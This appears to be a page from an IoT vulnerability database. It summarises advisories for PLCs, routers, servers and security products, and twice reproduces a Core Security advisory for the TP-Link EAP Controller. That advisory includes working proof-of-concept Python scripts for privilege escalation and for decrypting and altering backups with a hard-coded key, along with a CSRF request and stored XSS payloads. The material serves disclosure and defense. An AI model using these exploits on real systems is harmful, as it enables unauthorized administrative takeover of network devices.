VARIoT IoT vulnerabilities database

The MAC1100PLC Programmable Logic Controller (PLC) is a product of the Dalian Controller (DCCE) Programmable Logic Controller (PLC) family. A remote control vulnerability exists in the MAC1100PLC. The attacker can use the vulnerability to directly control the opening and stopping of the PLC remotely, which affects the normal operation of the controller

T-920 Programmable Logic Controller (PLC) is one of the products of China TENGCONTROL TECHNOLOGY T9 series of programmable logic controller (PLC) series. The plant products are widely used in important industrial control sites such as tobacco, petrochemical and water affairs. Tencent T920 PLC has a denial of service vulnerability. An attacker can use the vulnerability to construct a specific network data packet to make Teng920 T-920 CPU deny service during communication. The CPU enters a failure mode and affects the normal operation of the controller

Some Lenovo System x server BIOS/UEFI versions, when Secure Boot mode is enabled by a system administrator, do not properly authenticate signed code before booting it. As a result, an attacker with physical access to the system could boot unsigned code. plural Lenovo System Product BIOS Contains an authentication vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. LenovoFlexSystemx240M5 and so on are all Lenovo's server equipment. Multiple Lenovo System x Servers are prone to a local authentication-bypass vulnerability. An attacker can exploit this issue to bypass the authentication mechanism and perform unauthorized actions. This may lead to further attacks

In Lantech IDS 2102 2.0 and prior, a stack-based buffer overflow vulnerability has been identified which may allow remote code execution. A CVSS v3 base score of 9.8 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). Lantech IDS 2102 Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The Lantech IDS 2102 is an Ethernet device server. A remote attacker could exploit the vulnerability to execute code. Lantech IDS 2102 is prone to the following multiple security vulnerabilities: 1. A stack-based buffer-overflow vulnerability 2. Failed exploit attempts will likely cause a denial-of-service condition

In Lantech IDS 2102 2.0 and prior, nearly all input fields allow for arbitrary input on the device. A CVSS v3 base score of 9.8 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). Lantech IDS 2102 Contains an input validation vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The Lantech IDS 2102 is an Ethernet device server. An input validation vulnerability exists in Lantech IDS 2102 2.0 and earlier. A remote attacker can exploit the vulnerability to execute arbitrary code by constructing malicious input. Lantech IDS 2102 is prone to the following multiple security vulnerabilities: 1. A stack-based buffer-overflow vulnerability 2. Failed exploit attempts will likely cause a denial-of-service condition

An issue was discovered on D-Link DSL-3782 EU 1.01 devices. An authenticated user can pass a long buffer as a 'read' parameter to the '/userfs/bin/tcapi' binary (in the Diagnostics component) using the 'read <node_name>' function and cause memory corruption. Furthermore, it is possible to redirect the flow of the program and execute arbitrary code. D-Link DSL-3782 EU Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. D-LinkDSL-3782 is a wireless router product from D-Link. A security vulnerability exists in the D-LinkDSL-3782EU1.01 release

Dell EMC Unity Operating Environment (OE) versions prior to 4.3.0.1522077968 are affected by multiple OS command injection vulnerabilities. A remote application admin user could potentially exploit the vulnerabilities to execute arbitrary OS commands as system root on the system where Dell EMC Unity is installed. Multiple Dell EMC Products are prone to multiple remote command-injection vulnerabilities. Successfully exploiting these issues may allow an attacker to execute arbitrary code in the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. Customers can refer to Dell EMC target code information at: https://support.emc.com/docu39695_Target_Revisions_and_Adoption_Rates.pdf?language=en_US&language=en_US. Link to remedies: Registered Dell EMC Support customers can download Dell EMC Unity software from the Dell EMC Online Support web site. https://support.emc.com/downloads/39949_Dell-EMC-Unity-Family Read and use the information in this EMC Security Advisory to assist in avoiding any situation that might arise from the problems described herein. If you have any questions regarding this product alert, contact EMC Software Technical Support at 1-877-534-2867. For an explanation of Severity Ratings, refer to EMC Knowledgebase solution emc218831. EMC recommends all customers take into account both the base score and any relevant temporal and environmental scores which may impact the potential severity associated with particular security vulnerability. EMC recommends that all users determine the applicability of this information to their individual situations and take appropriate action. The information set forth herein is provided "as is" without warranty of any kind. EMC disclaims all warranties, either express or implied, including the warranties of merchantability, fitness for a particular purpose, title and non-infringement. In no event, shall EMC or its suppliers, be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if EMC or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages, so the foregoing limitation may not apply. -----BEGIN PGP SIGNATURE----- Version: GnuPG v2 iQEcBAEBCAAGBQJa6xEFAAoJEHbcu+fsE81ZL2gIAIfkwyT237qfIpxrPZdUKyJB X/HijxN0DU6xLdCw4kzjFCt4I1piYb+Sw/HPPJGfwIXG68oPLrlvJS3cONrEUF3N 7xMEV0qUvrwKApIviJbmNnoOPJeqMYNVY6SXm/iZdsNLNC2YHNmDkpx0KbPJ6G8f bX0GRyaMDA63WK9BGstrFR1MT3gEuCBnem5SC7k6w4dzOTL/ZcQXtNcYIEP1ubV6 9RKZkKr5EYkjB0XcS43knXVyHY9InJq+gxu1R86yz2pusd9WyCn7zTewHQHyVQrv /kCwkaJ57CoFVgKrQj/AzCrBTtia8E5e3hdE93bQncSlacUFE/aBfF4eQ/j2hcY= =IJQe -----END PGP SIGNATURE-----

Stored Cross-site scripting (XSS) vulnerability in the TP-Link EAP Controller and Omada Controller versions 2.5.4_Windows/2.6.0_Windows allows authenticated attackers to inject arbitrary web script or HTML via the userName parameter in the local user creation functionality. This is fixed in version 2.6.1_Windows. TP-Link EAP Controller and Omada Controller Contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. A privilege-escalation vulnerability 2. A hard-coded cryptographic key vulnerability 3. A cross-site request-forgery vulnerability 4. Multiple HTML-injection vulnerability An attacker may leverage these issues to gain elevated privileges, perform unauthorized actions and gain access to the affected application, or execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. **Advisory Information** Title: TP-Link EAP Controller Multiple Vulnerabilities Advisory ID: CORE-2018-0001 Advisory URL: http://www.coresecurity.com/advisories/tp-link-eap-controller-multiple-vulnerabilities Date published: 2018-05-03 Date of last update: 2018-04-17 Vendors contacted: TP-Link Release mode: Coordinated release 2. **Vulnerability Information** Class: Improper Privilege Management [CWE-269], Use of Hard-coded Cryptographic Key [CWE-321], Cross-Site Request Forgery [CWE-352], Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') [CWE-79], Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') [CWE-79] Impact: Code execution, Security bypass Remotely Exploitable: Yes Locally Exploitable: Yes CVE Name: CVE-2018-10168, CVE-2018-10167, CVE-2018-10166, CVE-2018-10165, CVE-2018-10164 3. It allows you to centrally manage your EAP devices using a Web browser. Vulnerabilities were found in the EAP Controller management software, allowing privilege escalation due to improper privilege management in the Web application. Due to the use of a hard-coded cryptographic key the backup file of the Web application can be decrypted, modified and restored back. Also, the Web application does not have Cross-Site Request Forgery protection and finally, two stored Cross Site Scripting vulnerabilities were found. 4. **Vulnerable Packages** . TP-Link EAP Controller_V2.5.4_Windows . TP-Link Omada Controller_V2.6.0_Windows Other products and versions might be affected, but they were not tested. 5. **Vendor Information, Solutions and Workarounds** TP-Link released Omada Controller_V2.6.1_Windows [2] that fixes the reported issues. 6. **Credits** This vulnerability was discovered and researched by Julian MuA+-oz from Core Security Exploits QA. The publication of this advisory was coordinated by Alberto Solino and Leandro Cuozzo from Core Advisories Team. 7. **Technical Description / Proof of Concept Code** TP-Link EAP Controller doesn't have any role control on the Web app API, only the application GUI seems to be restricting low lever users (observer) from changing settings. The vulnerability presented in 7.1 shows how a low privilege user (observer) can make a request and create a new administrator user. On 7.2 we show the software uses a hardcoded key to encrypt the Web application's backup file. An attacker possessing such key, and knowing the encryption algorithm would allow the backup file to be decrypted and modified. Forcing a user to restore this backup (using 7.3) can give us total control over the managed devices. On 7.3 we show the application does not have any Cross-Site Request Forgery Protection giving an attacker the possibility of forcing an end user to execute any unwanted actions on the EAP Controller in which the victim is currently authenticated. 7.1. **Privilege escalation from Observer to Administrator** [CVE-2018-10168] The software does not control privileges on the usage of the Web API, allowing a low privilege user to make any request as an Administrator. The following PoC shows the creation of a new Administrator, by just having the session cookie of an observer (lowest privilege user): /----- import requests session = requests.Session() session.trust_env = False tpeap_session_id = "80ab613a-590c-47ac-a2d6-f2949a0e9daa" #observer session_id cookie = {'TPEAP_SESSIONID': tpeap_session_id} data = {"name": "coresecurity", "roleId": "59fb411ebb62eef169069ac3", "password": "123456", "email": "fakemail@gmail.com", "roleName": "administrator"} #create user create_user_response = session.post('https://EAP_CONTROLER_IP:8043/user/addUser', cookies=cookie, data=data, verify=False) -----/ The roleId parameter can be discovered in 7.2 by decrypting the backup file. 7.2.**Download, Decrypt and Restore the web app backup file** [CVE-2018-10167] As described, the whole Web API do not restrict low privilege users, so an observer can make a request to download the web app backup file. The following xml is part of the decrypted backup file, modifying those fields would give us control over the EAP device since we can inject a user and password for the user account and enable SSH on the device. With this we can connect remotely to the access point via SSH with the given credentials. /----- <useraccount> { "id" : "5a09fad8bb62eef169069ad3", "userName" : "attacker", "password" : "1234567", "site" : "Default", "key" : "userAccount" } </useraccount> <ssh> { "id" : "59fb411fbb62eef169069ac7", "sshserverPort" : 22, "sshenable" : true, "site" : "Default", "key" : "ssh" } </ssh> -----/ The following code shows how this process is done, using an observer's session_id. First we get the backup file, decrypt it using the hard-coded key, then we modify it and finally upload it back to the server. /----- # -*- coding: utf-8 -*- import requests import codecs key = "Ei2HNryt8ysSdRRI54XNQHBEbOIRqNjQgYxsTmuW3srSVRVFyLh8mwvhBLPFQph3ecDMLnDtjDUdrUwt7oTsJuYl72hXESNiD6jFIQCtQN1unsmn" \ "3JXjeYwGJ55pqTkVyN2OOm3vekF6G1LM4t3kiiG4lGwbxG4CG1s5Sli7gcINFBOLXQnPpsQNWDmPbOm74mE7eyR3L7tk8tUhI17FLKm11hrrd1ck" \ "74bMw3VYSK3X5RrDgXelewMU6o1tJ3iX" def init_key(secret_key): key_in_bytes = map(ord, secret_key) number_list = range(0, 256) j = 0 for i, val in enumerate(number_list): j = j + number_list[i] + key_in_bytes[i] & 0xFF temp = number_list[i] number_list[i] = number_list[j] number_list[j] = temp return number_list def encrypt(data, key): key = init_key(key) input = [x for x in data] output = [] for x, elem in enumerate(data): i = 0 j = 0 i = (i + 1) % 256 j = (j + key[i]) % 256 temp = key[i] key[i] = key[j] key[j] = temp t = (key[i] + key[j] % 256) % 256 iY = key[t] iCY = iY output.append(chr(ord(input[x]) ^ iCY)) ret = ''.join(output) return ret session = requests.Session() session.trust_env = False tpeap_session_id = "80ab613a-590c-47ac-a2d6-f2949a0e9daa" cookie = {'TPEAP_SESSIONID': tpeap_session_id} #get backup file get_backup_response = session.get('https://EAP_CONTROLER_IP:8043/globalsetting/backup', cookies=cookie, verify=False) #decrypt backup file decrypted_backup = encrypt(unicode(get_backup_response.content, 'utf-8'), key) #modify decrypted backup file patched_backup = decrypted_backup.replace('normaluser', 'attacker') #encrypt the file and save it path_to_write = r"C:\fake_path\patched_backup_from_observer.cfg" encrypt_patched_backup = unicode(encrypt(patched_backup, key), 'unicode-escape') h = codecs.open(path_to_write, "w", encoding='utf-8') h.write(encrypt_patched_backup) h.close() #upload patched backup file files = {'file': open(path_to_write, 'rb')} restore_backup_response = session.post('https://EAP_CONTROLER_IP:8043/globalsetting/restore', files=files, cookies=cookie, verify=False) -----/ 7.3. **Lack of Cross-Site Request Forgery Protection** [CVE-2018-10166] There are no Anti-CSRF tokens in any forms on the Web interface. This would allow an attacker to submit authenticated requests when an authenticated user browses an attack-controlled domain. Proof of concept to create an Administrator User /----- POST /user/addUser HTTP/1.1 Host: EAP_CONTROLER_IP:8043 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1:5000/xss Content-Type: application/x-www-form-urlencoded Content-Length: 64 Cookie: TPEAP_LANGUAGE=en; TPEAP_SESSIONID=80ab613a-590c-47ac-a2d6-f2949a0e9daa Connection: close Upgrade-Insecure-Requests: 1 name=testuser&email=testuser%40gmail.com&roleId=59fb411ebb62eef169069ac3&password=123456&roleName=administrator -----/ 7.4. **Cross-Site Scripting in portalPictureUpload** [CVE-2018-10164] The implementation of portalPictureUpload can be abused and leads to a stored Cross Site Scripting. Decrypting the backup file shows that the portal background image is uploaded encoded in base64 and stored in the software database (mongoDB) In the following example we encode "<script>alert(1)</script>" in base64, the results is "PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==" so we replace the fileData with the code and restore the backup file. /----- <picturefiles> <file> <fileId>5a383b962dc07622f0bdc101</fileId> <fileData>PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==</fileData> </file> </picturefiles> -----/ To execute the stored XSS we enter the page https://EAP_CONTROLER_IP:8043/globalsetting/portalPictureLoad?fileId=5a383b962dc07622f0bdc101 (using the fileId used in the example). 8. **Report Timeline** 2018-01-12: Core Security sent an initial notification to TP-LINK, asking for GPG keys in order to send draft advisory. 2018-01-14: TP-Link answered asking for the advisory in clear text. 2018-01-15: Core Security sent the draft advisory to TP-Link in clear text form. 2018-01-29: TP-Link informed Core Security they checked the draft advisory and they are going to fix the vulnerabilities. 2018-01-29: Core Security asked if all the reported vulnerabilities were confirmed and request an estimated release date for the fix. 2018-02-07: TP-Link informed that they were working in a beta version of the fix and they will provide it to Core Security for test. 2018-02-07: Core Security thanked TP-Link's answer and asked for a tentative date for this beta version. 2018-02-19: Core Security tested the beta version and verified that all the vulnerabilities were fixed. Also, Core Security asked for a tentative release date for the fix. 2018-02-27: Core Security asked for a status update again. However, this version didn't address the reported vulnerabilities. Core Security asked for a status update again. 2018-03-01: Core Security thanked TP-Link's answer and requested for a regular contact till the release of the fixed version. 2018-03-19: Core Security requested a status update. 2018-03-21: TP-Link confirmed that the new version will be available in early April. 2018-03-26: Core Security thanked TP-Link's reply an asked for a solidified release date. 2018-04-13: Core Security noticed that a new version of the EAP Controller was released (v2.6.1) and asked TP-Link if this version fixed the reported vulnerabilities. 2018-04-16: Core Security tested the new release and confirmed that the reported vulnerabilities were addressed. 2018-04-17: Core Security set release date to be May 3rd at 12 PM EST. 9. **References** [1] https://www.tp-link.com/en/products/details/EAP-Controller.html. [2] https://www.tp-link.com/en/download/EAP-Controller.html#Controller_Software. 10. **About CoreLabs** CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 11. **About Core Security** Core Security provides companies with the security insight they need to know who, how, and what is vulnerable in their organization. The company's threat-aware, identity & access, network security, and vulnerability management solutions provide actionable insight and context needed to manage security risks across the enterprise. This shared insight gives customers a comprehensive view of their security posture to make better security remediation decisions. Better insight allows organizations to prioritize their efforts to protect critical assets, take action sooner to mitigate access risk, and react faster if a breach does occur. Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@coresecurity.com 12. **Disclaimer** The contents of this advisory are copyright (c) 2018 Core Security and (c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 13. **PGP/GPG Keys** This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc

Stored Cross-site scripting (XSS) vulnerability in the TP-Link EAP Controller and Omada Controller versions 2.5.4_Windows/2.6.0_Windows allows authenticated attackers to inject arbitrary web script or HTML via the implementation of portalPictureUpload functionality. This is fixed in version 2.6.1_Windows. A privilege-escalation vulnerability 2. A hard-coded cryptographic key vulnerability 3. A cross-site request-forgery vulnerability 4. Multiple HTML-injection vulnerability An attacker may leverage these issues to gain elevated privileges, perform unauthorized actions and gain access to the affected application, or execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. **Advisory Information** Title: TP-Link EAP Controller Multiple Vulnerabilities Advisory ID: CORE-2018-0001 Advisory URL: http://www.coresecurity.com/advisories/tp-link-eap-controller-multiple-vulnerabilities Date published: 2018-05-03 Date of last update: 2018-04-17 Vendors contacted: TP-Link Release mode: Coordinated release 2. **Vulnerability Information** Class: Improper Privilege Management [CWE-269], Use of Hard-coded Cryptographic Key [CWE-321], Cross-Site Request Forgery [CWE-352], Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') [CWE-79], Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') [CWE-79] Impact: Code execution, Security bypass Remotely Exploitable: Yes Locally Exploitable: Yes CVE Name: CVE-2018-10168, CVE-2018-10167, CVE-2018-10166, CVE-2018-10165, CVE-2018-10164 3. It allows you to centrally manage your EAP devices using a Web browser. Vulnerabilities were found in the EAP Controller management software, allowing privilege escalation due to improper privilege management in the Web application. Due to the use of a hard-coded cryptographic key the backup file of the Web application can be decrypted, modified and restored back. Also, the Web application does not have Cross-Site Request Forgery protection and finally, two stored Cross Site Scripting vulnerabilities were found. 4. **Vulnerable Packages** . TP-Link EAP Controller_V2.5.4_Windows . TP-Link Omada Controller_V2.6.0_Windows Other products and versions might be affected, but they were not tested. 5. **Vendor Information, Solutions and Workarounds** TP-Link released Omada Controller_V2.6.1_Windows [2] that fixes the reported issues. 6. **Credits** This vulnerability was discovered and researched by Julian MuA+-oz from Core Security Exploits QA. The publication of this advisory was coordinated by Alberto Solino and Leandro Cuozzo from Core Advisories Team. 7. **Technical Description / Proof of Concept Code** TP-Link EAP Controller doesn't have any role control on the Web app API, only the application GUI seems to be restricting low lever users (observer) from changing settings. The vulnerability presented in 7.1 shows how a low privilege user (observer) can make a request and create a new administrator user. On 7.2 we show the software uses a hardcoded key to encrypt the Web application's backup file. An attacker possessing such key, and knowing the encryption algorithm would allow the backup file to be decrypted and modified. Forcing a user to restore this backup (using 7.3) can give us total control over the managed devices. On 7.3 we show the application does not have any Cross-Site Request Forgery Protection giving an attacker the possibility of forcing an end user to execute any unwanted actions on the EAP Controller in which the victim is currently authenticated. Finally, we discovered two Cross-Site Scripting, one on the creation of a local user in the parameter userName (7.4) and the other one abusing the implementation of portalPictureUpload (7.5). 7.1. **Privilege escalation from Observer to Administrator** [CVE-2018-10168] The software does not control privileges on the usage of the Web API, allowing a low privilege user to make any request as an Administrator. The following PoC shows the creation of a new Administrator, by just having the session cookie of an observer (lowest privilege user): /----- import requests session = requests.Session() session.trust_env = False tpeap_session_id = "80ab613a-590c-47ac-a2d6-f2949a0e9daa" #observer session_id cookie = {'TPEAP_SESSIONID': tpeap_session_id} data = {"name": "coresecurity", "roleId": "59fb411ebb62eef169069ac3", "password": "123456", "email": "fakemail@gmail.com", "roleName": "administrator"} #create user create_user_response = session.post('https://EAP_CONTROLER_IP:8043/user/addUser', cookies=cookie, data=data, verify=False) -----/ The roleId parameter can be discovered in 7.2 by decrypting the backup file. 7.2.**Download, Decrypt and Restore the web app backup file** [CVE-2018-10167] As described, the whole Web API do not restrict low privilege users, so an observer can make a request to download the web app backup file. The following xml is part of the decrypted backup file, modifying those fields would give us control over the EAP device since we can inject a user and password for the user account and enable SSH on the device. With this we can connect remotely to the access point via SSH with the given credentials. /----- <useraccount> { "id" : "5a09fad8bb62eef169069ad3", "userName" : "attacker", "password" : "1234567", "site" : "Default", "key" : "userAccount" } </useraccount> <ssh> { "id" : "59fb411fbb62eef169069ac7", "sshserverPort" : 22, "sshenable" : true, "site" : "Default", "key" : "ssh" } </ssh> -----/ The following code shows how this process is done, using an observer's session_id. First we get the backup file, decrypt it using the hard-coded key, then we modify it and finally upload it back to the server. /----- # -*- coding: utf-8 -*- import requests import codecs key = "Ei2HNryt8ysSdRRI54XNQHBEbOIRqNjQgYxsTmuW3srSVRVFyLh8mwvhBLPFQph3ecDMLnDtjDUdrUwt7oTsJuYl72hXESNiD6jFIQCtQN1unsmn" \ "3JXjeYwGJ55pqTkVyN2OOm3vekF6G1LM4t3kiiG4lGwbxG4CG1s5Sli7gcINFBOLXQnPpsQNWDmPbOm74mE7eyR3L7tk8tUhI17FLKm11hrrd1ck" \ "74bMw3VYSK3X5RrDgXelewMU6o1tJ3iX" def init_key(secret_key): key_in_bytes = map(ord, secret_key) number_list = range(0, 256) j = 0 for i, val in enumerate(number_list): j = j + number_list[i] + key_in_bytes[i] & 0xFF temp = number_list[i] number_list[i] = number_list[j] number_list[j] = temp return number_list def encrypt(data, key): key = init_key(key) input = [x for x in data] output = [] for x, elem in enumerate(data): i = 0 j = 0 i = (i + 1) % 256 j = (j + key[i]) % 256 temp = key[i] key[i] = key[j] key[j] = temp t = (key[i] + key[j] % 256) % 256 iY = key[t] iCY = iY output.append(chr(ord(input[x]) ^ iCY)) ret = ''.join(output) return ret session = requests.Session() session.trust_env = False tpeap_session_id = "80ab613a-590c-47ac-a2d6-f2949a0e9daa" cookie = {'TPEAP_SESSIONID': tpeap_session_id} #get backup file get_backup_response = session.get('https://EAP_CONTROLER_IP:8043/globalsetting/backup', cookies=cookie, verify=False) #decrypt backup file decrypted_backup = encrypt(unicode(get_backup_response.content, 'utf-8'), key) #modify decrypted backup file patched_backup = decrypted_backup.replace('normaluser', 'attacker') #encrypt the file and save it path_to_write = r"C:\fake_path\patched_backup_from_observer.cfg" encrypt_patched_backup = unicode(encrypt(patched_backup, key), 'unicode-escape') h = codecs.open(path_to_write, "w", encoding='utf-8') h.write(encrypt_patched_backup) h.close() #upload patched backup file files = {'file': open(path_to_write, 'rb')} restore_backup_response = session.post('https://EAP_CONTROLER_IP:8043/globalsetting/restore', files=files, cookies=cookie, verify=False) -----/ 7.3. **Lack of Cross-Site Request Forgery Protection** [CVE-2018-10166] There are no Anti-CSRF tokens in any forms on the Web interface. This would allow an attacker to submit authenticated requests when an authenticated user browses an attack-controlled domain. Proof of concept to create an Administrator User /----- POST /user/addUser HTTP/1.1 Host: EAP_CONTROLER_IP:8043 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1:5000/xss Content-Type: application/x-www-form-urlencoded Content-Length: 64 Cookie: TPEAP_LANGUAGE=en; TPEAP_SESSIONID=80ab613a-590c-47ac-a2d6-f2949a0e9daa Connection: close Upgrade-Insecure-Requests: 1 name=testuser&email=testuser%40gmail.com&roleId=59fb411ebb62eef169069ac3&password=123456&roleName=administrator -----/ 7.4. **Cross-Site Scripting in the creation of a local User** [CVE-2018-10165] The following parameter of the local user creation is vulnerable to a stored Cross Site Scripting: userName The following is a proof of concept to demonstrate the vulnerability: /----- POST /hotspot/localUser/saveUser HTTP/1.1 Host: EAP_CONTROLER_IP:8043 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1:5000/xss Content-Type: application/x-www-form-urlencoded Content-Length: 64 Cookie: TPEAP_LANGUAGE=en Connection: close Upgrade-Insecure-Requests: 1 userName=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&password=123456 -----/ 7.5. **Cross-Site Scripting in portalPictureUpload** [CVE-2018-10164] The implementation of portalPictureUpload can be abused and leads to a stored Cross Site Scripting. Decrypting the backup file shows that the portal background image is uploaded encoded in base64 and stored in the software database (mongoDB) In the following example we encode "<script>alert(1)</script>" in base64, the results is "PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==" so we replace the fileData with the code and restore the backup file. /----- <picturefiles> <file> <fileId>5a383b962dc07622f0bdc101</fileId> <fileData>PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==</fileData> </file> </picturefiles> -----/ To execute the stored XSS we enter the page https://EAP_CONTROLER_IP:8043/globalsetting/portalPictureLoad?fileId=5a383b962dc07622f0bdc101 (using the fileId used in the example). 8. **Report Timeline** 2018-01-12: Core Security sent an initial notification to TP-LINK, asking for GPG keys in order to send draft advisory. 2018-01-14: TP-Link answered asking for the advisory in clear text. 2018-01-15: Core Security sent the draft advisory to TP-Link in clear text form. 2018-01-29: TP-Link informed Core Security they checked the draft advisory and they are going to fix the vulnerabilities. 2018-01-29: Core Security asked if all the reported vulnerabilities were confirmed and request an estimated release date for the fix. 2018-02-07: TP-Link informed that they were working in a beta version of the fix and they will provide it to Core Security for test. 2018-02-07: Core Security thanked TP-Link's answer and asked for a tentative date for this beta version. 2018-02-19: Core Security tested the beta version and verified that all the vulnerabilities were fixed. Also, Core Security asked for a tentative release date for the fix. 2018-02-27: Core Security asked for a status update again. However, this version didn't address the reported vulnerabilities. Core Security asked for a status update again. 2018-03-01: Core Security thanked TP-Link's answer and requested for a regular contact till the release of the fixed version. 2018-03-19: Core Security requested a status update. 2018-03-21: TP-Link confirmed that the new version will be available in early April. 2018-03-26: Core Security thanked TP-Link's reply an asked for a solidified release date. 2018-04-13: Core Security noticed that a new version of the EAP Controller was released (v2.6.1) and asked TP-Link if this version fixed the reported vulnerabilities. 2018-04-16: Core Security tested the new release and confirmed that the reported vulnerabilities were addressed. 2018-04-17: Core Security set release date to be May 3rd at 12 PM EST. 9. **References** [1] https://www.tp-link.com/en/products/details/EAP-Controller.html. [2] https://www.tp-link.com/en/download/EAP-Controller.html#Controller_Software. 10. **About CoreLabs** CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 11. **About Core Security** Core Security provides companies with the security insight they need to know who, how, and what is vulnerable in their organization. The company's threat-aware, identity & access, network security, and vulnerability management solutions provide actionable insight and context needed to manage security risks across the enterprise. This shared insight gives customers a comprehensive view of their security posture to make better security remediation decisions. Better insight allows organizations to prioritize their efforts to protect critical assets, take action sooner to mitigate access risk, and react faster if a breach does occur. Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@coresecurity.com 12. **Disclaimer** The contents of this advisory are copyright (c) 2018 Core Security and (c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 13. **PGP/GPG Keys** This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc

A SQL injection remote code execution vulnerability in Trend Micro Smart Protection Server (Standalone) 3.x could allow a remote attacker to execute arbitrary code on vulnerable installations due to a flaw within the handling of parameters provided to wcs\_bwlists\_handler.php. Authentication is required in order to exploit this vulnerability. The issue results from the lack of proper validation of a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to remotely execute code under the context of webserv. A SQL injection vulnerability exists in Trend MicroSmartProtectionServer (Standalone) 3.x, which was caused by a program failing to properly detect SQL queries before they were built using user-submitted strings. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database or to cause a denial-of-service condition

A vulnerability in Trend Micro Smart Protection Server (Standalone) 3.x could allow an unauthenticated remote attacker to manipulate the product to send a large number of specially crafted HTTP requests to potentially cause the file system to fill up, eventually causing a denial of service (DoS) situation. Trend Micro Smart Protection Server (Standalone) Contains a resource exhaustion vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. A security vulnerability exists in Trend MicroSmartProtectionServer (Standalone) 3.x. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database or to cause a denial-of-service condition

A vulnerability in the implementation of Point-to-Point Tunneling Protocol (PPTP) functionality in Cisco Aironet 1810, 1830, and 1850 Series Access Points could allow an unauthenticated, remote attacker to cause an affected device to reload, resulting in a denial of service (DoS) condition. The vulnerability is due to insufficient validation of Generic Routing Encapsulation (GRE) frames that pass through the data plane of an affected access point. An attacker could exploit this vulnerability by initiating a PPTP connection to an affected access point from a device that is registered to the same wireless network as the access point and sending a malicious GRE frame through the data plane of the access point. A successful exploit could allow the attacker to cause the NSS core process on the affected access point to crash, which would cause the access point to reload and result in a DoS condition. This vulnerability affects Cisco Aironet 1810, 1830, and 1850 Series Access Points that are running Cisco Mobility Express Software Release 8.4.100.0, 8.5.103.0, or 8.5.105.0 and are configured as a master, subordinate, or standalone access point. Cisco Bug IDs: CSCvf73890. Vendors report this vulnerability Bug ID CSCvf73890 Published as.Denial of service (DoS) May be in a state. MobilityExpressSoftware is a set of management control software running on it. This vulnerability is due to insufficient verification of the program. Multiple Cisco Products are prone to a denial-of-service vulnerability. An attacker can exploit this issue to cause a denial-of-service condition

